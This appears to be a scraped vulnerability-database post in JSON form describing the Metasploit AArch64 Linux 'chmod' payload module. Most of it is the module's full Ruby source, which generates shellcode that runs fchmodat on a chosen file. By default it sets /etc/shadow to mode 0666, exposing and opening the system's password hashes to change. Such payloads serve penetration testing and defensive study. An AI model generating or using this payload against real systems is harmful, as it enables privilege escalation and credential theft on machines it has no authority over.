{“lastseen”:”2026-01-14T19:28:51″,”description”:”Runs chmod on the specified file with specified mode. Module Options msf use payload\/linux\/aarch64\/chmod msf payloadchmod show actions …actions… msf payloadchmod set ACTION msf payloadchmod show options …show and set options… msf payloadchmod…”,”published”:”2026-01-14T18:54:21″,”modified”:”2026-01-14T18:54:21″,”type”:”metasploit”,”title”:”Linux Chmod”,”source”:””,”references”:””,”id”:”MSF:PAYLOAD-LINUX-AARCH64-CHMOD-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nmodule MetasploitModule\\n CachedSize = 48\\n\\n include Msf::Payload::Single\\n include Msf::Payload::Linux::Aarch64::Prepends\\n\\n def initialize(info = {})\\n super(\\n merge_info(\\n info,\\n ‘Name’ =\\u003e ‘Linux Chmod’,\\n ‘Description’ =\\u003e ‘Runs chmod on the specified file with specified mode.’,\\n ‘Author’ =\\u003e ‘bcoles’,\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Platform’ =\\u003e ‘linux’,\\n ‘Arch’ =\\u003e ARCH_AARCH64,\\n ‘References’ =\\u003e [\\n [‘URL’, ‘https:\/\/man7.org\/linux\/man-pages\/man2\/fchmodat.2.html’],\\n [‘URL’, ‘https:\/\/github.com\/bcoles\/shellcode\/blob\/main\/aarch64\/chmod\/chmod.s’],\\n ]\\n )\\n )\\n register_options([\\n OptString.new(‘FILE’, [ true, ‘Filename to chmod’, ‘\/etc\/shadow’ ]),\\n OptString.new(‘MODE’, [ true, ‘File mode (octal)’, ‘0666’ ]),\\n ])\\n end\\n\\n # @return [String] the full path of the file to be modified\\n def chmod_file_path\\n datastore[‘FILE’] || ”\\n end\\n\\n # @return [Integer] the desired mode for the file\\n def mode\\n (datastore[‘MODE’] || ‘0666’).oct\\n rescue StandardError =\\u003e e\\n raise ArgumentError, \\”Invalid chmod mode ‘#{datastore[‘MODE’]}’: #{e.message}\\”\\n end\\n\\n # @return [Integer] AArch64 instruction to load mode into x2 register\\n # For example: 0xd28036c2 ; mov x2, #0x1b6 ; loads 0x1b6 (0o666) into x2\\n def chmod_instruction(mode)\\n (0xd2800000 | ((mode \\u0026 0xffff) \\u003c\\u003c 5) | 2)\\n end\\n\\n def generate(_opts = {})\\n raise ArgumentError, \\”chmod mode (#{mode}) is greater than maximum mode size (0x7FF)\\” if mode \\u003e 0x7FF\\n\\n shellcode = [\\n 0x92800c60, # mov x0, #0xffffffffffffff9c \/\/ #-100\\n 0x10000101, # adr x1, 40009c \\u003cpath\\u003e\\n chmod_instruction(mode), # mov x2, \\u003cmode\\u003e\\n 0xd2800003, # mov x3, #0\\n 0xd28006a8, # mov x8, #0x35 # __NR_fchmodat\\n 0xd4000001, # svc #0\\n 0xd2800000, # mov x0, #0\\n 0xd2800ba8, # mov x8, #0x5d # __NR_exit\\n 0xd4000001 # svc #0\\n ].pack(‘V*’)\\n shellcode += chmod_file_path + \\”\\\\x00\\”\\n\\n # align our shellcode to 4 bytes\\n shellcode += \\”\\\\x00\\” while shellcode.bytesize % 4 != 0\\n\\n super.to_s + shellcode\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/payloads\/singles\/linux\/aarch64\/chmod.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/payload\/linux\/aarch64\/chmod\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-14T19:28:51″,”description”:”Runs chmod on the specified file with specified mode. Module Options msf use payload\/linux\/aarch64\/chmod msf payloadchmod show actions …actions… msf payloadchmod set ACTION msf payloadchmod…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-35722","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n